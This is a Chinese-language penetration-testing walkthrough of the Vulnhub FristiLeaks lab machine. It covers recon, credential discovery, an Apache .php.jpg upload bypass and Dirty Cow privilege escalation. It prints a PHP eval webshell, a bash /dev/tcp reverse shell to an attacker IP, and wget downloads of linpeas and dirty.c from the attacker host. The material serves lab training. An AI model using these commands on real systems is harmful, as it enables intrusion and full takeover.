Vulnhub-FristiLeaks
字数 1109 2025-08-29 22:41:39
Vulnhub-FristiLeaks 靶机渗透测试教学文档
靶机环境准备
-
下载与安装:
- 从Vulnhub下载FristiLeaks靶机镜像
- 使用VMware打开该镜像
-
网络配置:
- 网络模式设置为NAT
- 在高级设置中将MAC地址修改为:
08:00:27:A5:A6:76
信息收集阶段
-
确定靶机IP:
- 靶机启动后会自动显示IP地址
- 或使用
netdiscover等工具扫描局域网
-
端口扫描:
nmap -sV -p- <靶机IP>- 发现仅开放80端口(HTTP服务)
-
目录枚举:
- 使用dirb扫描web目录:
dirb http://<靶机IP>- 发现
/robots.txt文件 - 访问显示目录无有效信息
-
源码分析:
- 检查网页源代码
- 发现多处提到"fristi"关键词
- 尝试访问
/fristi目录
Web应用渗透
-
登录页面分析:
/fristi目录下发现登录框- 初步猜测可能存在SQL注入漏洞
-
SQL注入测试:
- 使用sqlmap测试:
sqlmap -r test.txt --level=5 --risk=3- 测试结果显示不存在SQL注入
-
隐藏信息发现:
- 检查页面源码发现提示信息
- 发现被注释的base64编码字符串
- 解码后得到一张图片
-
凭据获取:
- 根据提示,用户名可能是
eezeepz - 密码为图片内容(需人工识别)
- 使用获取的凭据成功登录
- 根据提示,用户名可能是
获取初始访问权限
-
文件上传漏洞利用:
- 登录后发现文件上传功能
- 限制上传
.jpg,.png,.gif后缀
-
Apache解析漏洞:
- 使用Wappalyzer识别Apache版本为2.2.15
- 该版本存在文件后缀名解析漏洞
- 上传
.php.jpg文件会被解析为PHP
-
上传Webshell:
- 上传一句话木马:
<?php @eval($_POST['epoch']); ?>- 使用蚁剑等工具连接Webshell
-
反弹Shell:
- 通过Webshell执行反弹命令:
bash -i >& /dev/tcp/<攻击机IP>/7777 0>&1- 在攻击机监听:
nc -lvnp 7777
权限提升
-
改善Shell环境:
python -c "import pty;pty.spawn('/bin/bash')" -
系统信息收集:
- 下载并运行Linux提权检查脚本:
wget http://<攻击机IP>/linpeas.sh -O /tmp/linpeas.sh chmod +x /tmp/linpeas.sh /tmp/linpeas.sh -
脏牛(Dirty Cow)漏洞利用:
- 识别系统存在CVE-2016-5195漏洞
- 下载漏洞利用代码:
wget http://<攻击机IP>/dirty.c -O /tmp/dirty.c- 编译并执行:
gcc -pthread dirty.c -o dirty -lcrypt chmod +x ./dirty ./dirty mypassword- 创建具有root权限的
firefart用户
-
获取Flag:
su firefart cd /root cat flag.txt
总结与关键点
-
关键渗透路径:
- 发现隐藏的
/fristi目录 - 通过源码分析获取凭据
- 利用Apache解析漏洞上传Webshell
- 使用Dirty Cow漏洞提权
- 发现隐藏的
-
技术要点:
- Apache 2.2.15的文件解析漏洞
- 反弹Shell的多种方法
- Dirty Cow本地提权漏洞利用
-
防御建议:
- 及时更新Web服务器软件
- 严格限制文件上传功能
- 定期更新操作系统内核
- 实施最小权限原则
-
学习价值:
- 信息收集与源码分析能力
- 文件上传漏洞的多种绕过方法
- 从Web渗透到系统提权的完整流程